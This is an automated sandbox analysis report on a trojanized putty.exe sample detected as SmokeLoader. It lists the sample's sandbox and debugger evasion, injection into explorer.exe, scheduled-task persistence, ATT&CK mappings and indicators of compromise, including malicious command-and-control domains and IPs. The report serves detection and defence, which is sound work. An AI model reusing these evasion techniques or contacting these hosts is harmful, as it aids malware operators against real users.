                Source: C:\Users\user\Desktop\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\putty.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\Desktop\putty.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
                Source: C:\Users\user\AppData\Roaming\hajefwbAPI/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\AppData\Roaming\hajefwbAPI/Special instruction interceptor: Address: 7FF8C88ED584
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: putty.exe, 00000000.00000002.2176960417.000000000083E000.00000004.00000020.00020000.00000000.sdmp, hajefwb, 00000004.00000002.2439614635.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 382Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 848Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1113Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3608Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1708Thread sleep count: 382 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3504Thread sleep count: 848 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3504Thread sleep time: -84800s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6104Thread sleep count: 1113 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6104Thread sleep time: -111300s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 5688Thread sleep count: 249 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5880Thread sleep count: 308 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5880Thread sleep time: -30800s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 380Thread sleep count: 295 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6104Thread sleep count: 3608 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6104Thread sleep time: -360800s >= -30000sJump to behavior
                Source: explorer.exe, 00000002.00000000.2164199732.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2162348523.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: explorer.exe, 00000002.00000000.2161750223.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                Source: explorer.exe, 00000002.00000000.2162348523.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                Source: explorer.exe, 00000002.00000000.2164199732.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000002.00000000.2162348523.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                Source: explorer.exe, 00000002.00000000.2162348523.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                Source: explorer.exe, 00000002.00000000.2161750223.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2164199732.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\putty.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\putty.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                Source: C:\Users\user\Desktop\putty.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\putty.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0084C45D push dword ptr fs:[00000030h]0_2_0084C45D
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_00940D90 mov eax, dword ptr fs:[00000030h]0_2_00940D90
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0094092B mov eax, dword ptr fs:[00000030h]0_2_0094092B
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00880D90 mov eax, dword ptr fs:[00000030h]4_2_00880D90
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_0088092B mov eax, dword ptr fs:[00000030h]4_2_0088092B
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 4_2_00AAAF25 push dword ptr fs:[00000030h]4_2_00AAAF25

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Benign windows process drops PE files
                Source: C:\Windows\explorer.exeFile created: hajefwb.2.drJump to dropped file
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 94.156.177.51 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 194.85.61.76 80Jump to behavior
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\putty.exeThread created: C:\Windows\explorer.exe EIP: 3041998Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbThread created: unknown EIP: 8381998Jump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\putty.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\putty.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\hajefwbSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                Source: explorer.exe, 00000002.00000000.2162061323.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: explorer.exe, 00000002.00000000.2162061323.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2163274118.0000000004B00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000002.00000000.2162061323.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000002.00000000.2162061323.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000002.00000000.2161750223.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 6_2_004055EB GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_004055EB
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0041E7A0 GetDateFormatA,FoldStringA,BuildCommDCBA,GetTimeFormatA,SetProcessPriorityBoost,SetFileAttributesA,UnregisterWaitEx,SetLocaleInfoA,InterlockedDecrement,GetCommandLineA,SetErrorMode,GetAtomNameA,SearchPathA,SetDefaultCommConfigA,GetConsoleAliasW,GetVersionExA,DisconnectNamedPipe,GetEnvironmentStringsW,WriteConsoleOutputW,GetModuleHandleA,OpenFileMappingW,LocalAlloc,InterlockedIncrement,0_2_0041E7A0

                Stealing of Sensitive Information

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 4.3.hajefwb.890000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hajefwb.880e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.putty.exe.940e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.putty.exe.950000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hajefwb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2110499167.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2388445359.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 4.3.hajefwb.890000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hajefwb.880e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.putty.exe.940e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.putty.exe.950000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hajefwb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2110499167.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2388445359.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Exploitation for Client Execution                		1
                DLL Side-Loading                		32
                Process Injection                		11
                Masquerading                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		12
                Virtualization/Sandbox Evasion                		LSASS Memory511
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
                Process Injection                		Security Account Manager12
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Hidden Files and Directories                		NTDS3
                Process Discovery                		Distributed Component Object ModelInput Capture113
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Obfuscated Files or Information                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing                		Cached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSync14
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                File Deletion                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578162 Sample: putty.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 23 restructurisationservice.ru 2->23 25 constractionscity1991.lat 2->25 27 connecticutproperty.ru 2->27 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 7 other signatures 2->47 7 putty.exe 2->7         started        10 hajefwb 2->10         started        12 hajefwb 2->12         started        signatures3 process4 signatures5 49 Detected unpacking (changes PE section rights) 7->49 51 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->51 53 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->53 61 4 other signatures 7->61 14 explorer.exe 96 3 7->14 injected 55 Antivirus detection for dropped file 10->55 57 Multi AV Scanner detection for dropped file 10->57 59 Machine Learning detection for dropped file 10->59 process6 dnsIp7 29 connecticutproperty.ru 194.85.61.76, 49747, 49908, 49920 RU-CENTERRU Russian Federation 14->29 31 restructurisationservice.ru 94.156.177.51, 49735, 49741, 49897 NET1-ASBG Bulgaria 14->31 19 C:\Users\user\AppData\Roaming\hajefwb, PE32 14->19 dropped 21 C:\Users\user\...\hajefwb:Zone.Identifier, ASCII 14->21 dropped 33 System process connects to network (likely due to code injection or exploit) 14->33 35 Benign windows process drops PE files 14->35 37 Deletes itself after installation 14->37 39 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->39 file8 signatures9

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                putty.exe38%VirustotalBrowse
                putty.exe47%ReversingLabs
                putty.exe100%AviraHEUR/AGEN.1312567
                putty.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\hajefwb100%AviraHEUR/AGEN.1312567
                C:\Users\user\AppData\Roaming\hajefwb100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\hajefwb47%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://constractionscity1991.lat/100%Avira URL Cloudmalware
                http://connecticutproperty.ru/100%Avira URL Cloudmalware
                http://restructurisationservice.ru/100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                constractionscity1991.lat
                		94.156.177.51
                		truefalse
                  		high
                  restructurisationservice.ru
                  		94.156.177.51
                  		truefalse
                    		high
                    connecticutproperty.ru
                    		194.85.61.76
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://connecticutproperty.ru/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://constractionscity1991.lat/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://restructurisationservice.ru/true
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://word.office.comonexplorer.exe, 00000002.00000000.2167378082.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.2170453754.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2164199732.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://powerpoint.office.comcemberexplorer.exe, 00000002.00000000.2169811038.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.2169811038.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://api.msn.com/explorer.exe, 00000002.00000000.2167378082.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  https://excel.office.comexplorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.microexplorer.exe, 00000002.00000000.2166756581.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2166091631.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2166717992.0000000008870000.00000002.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      http://crl.vexplorer.exe, 00000002.00000000.2161750223.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://outlook.comexplorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://wns.windows.com/)sexplorer.exe, 00000002.00000000.2167378082.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            94.156.177.51
                                            		constractionscity1991.latBulgaria
                                            		43561NET1-ASBGfalse
                                            194.85.61.76
                                            		connecticutproperty.ruRussian Federation
                                            		48287RU-CENTERRUfalse

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1578162
                                            Start date and time:2024-12-19 10:56:48 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 2s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:6
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:putty.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@3/2@3/2
                                            EGA Information:
                                            • Successful, ratio: 66.7%
                                            HCA Information:
                                            • Successful, ratio: 97%
                                            • Number of executed functions: 34
                                            • Number of non-executed functions: 17
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target hajefwb, PID 3648 because there are no executed function
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            04:58:00API Interceptor429384x Sleep call for process: explorer.exe modified
                                            10:58:11Task SchedulerRun new task: Firefox Default Browser Agent E7DF06E12256AB2C path: C:\Users\user\AppData\Roaming\hajefwb

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            94.156.177.51#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • restructurisationservice.ru/
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • restructurisationservice.ru/
                                            #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                            • restructurisationservice.ru/
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • restructurisationservice.ru/
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                            • restructurisationservice.ru/
                                            194.85.61.76#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • connecticutproperty.ru/
                                            Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • www.mrpokrovskii.pro/2pji/
                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                            • www.mrpokrovskii.pro/2pji/
                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                            • www.mrpokrovskii.pro/2pji/
                                            payments.exeGet hashmaliciousFormBookBrowse
                                            • www.mrpokrovskii.pro/2pji/
                                            RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                            • www.vpnboo.online/4kww/
                                            LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                            • www.vpnboo.online/m5yo/
                                            Yofmdizwhylbef.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                            • www.xn--d1acnfnmta.xn--p1ai/pn4e/?gc=raMz3&l2-nV=Axqd9uYmYp7orgQRubN12KIz0ETn9asgfk1mJK/Z6DbIFwnZ/4JiG197Yvj4xywBazNpNhV4fsXABdsflsvFVf+OSeCGS2bZ+rXq8mGhIxid
                                            Nbvkrvfanxfmla.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                            • www.xn--d1acnfnmta.xn--p1ai/pn4e/?KfTD=Axqd9uYmYp7orgQRubN12KIz0ETn9asgfk1mJK/Z6DbIFwnZ/4JiG197Yvj4xywBazNpNhV4fsXABdsflsvXc8+TStbsRm/06Q==&pd=8k02Xq71ReL2NgiL
                                            FATURA_DE_PAGAMENTO.exeGet hashmaliciousFormBookBrowse
                                            • www.barbershoploft.ru/de12/?WL08l6oh=z2MmLdpGYTzXqHttvHkhuP8LzrYrvN86bq5ZbTeVah9RZm+7kleL13c93Bfr74AMZ8sc&8pXDi=4hc4dRq

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
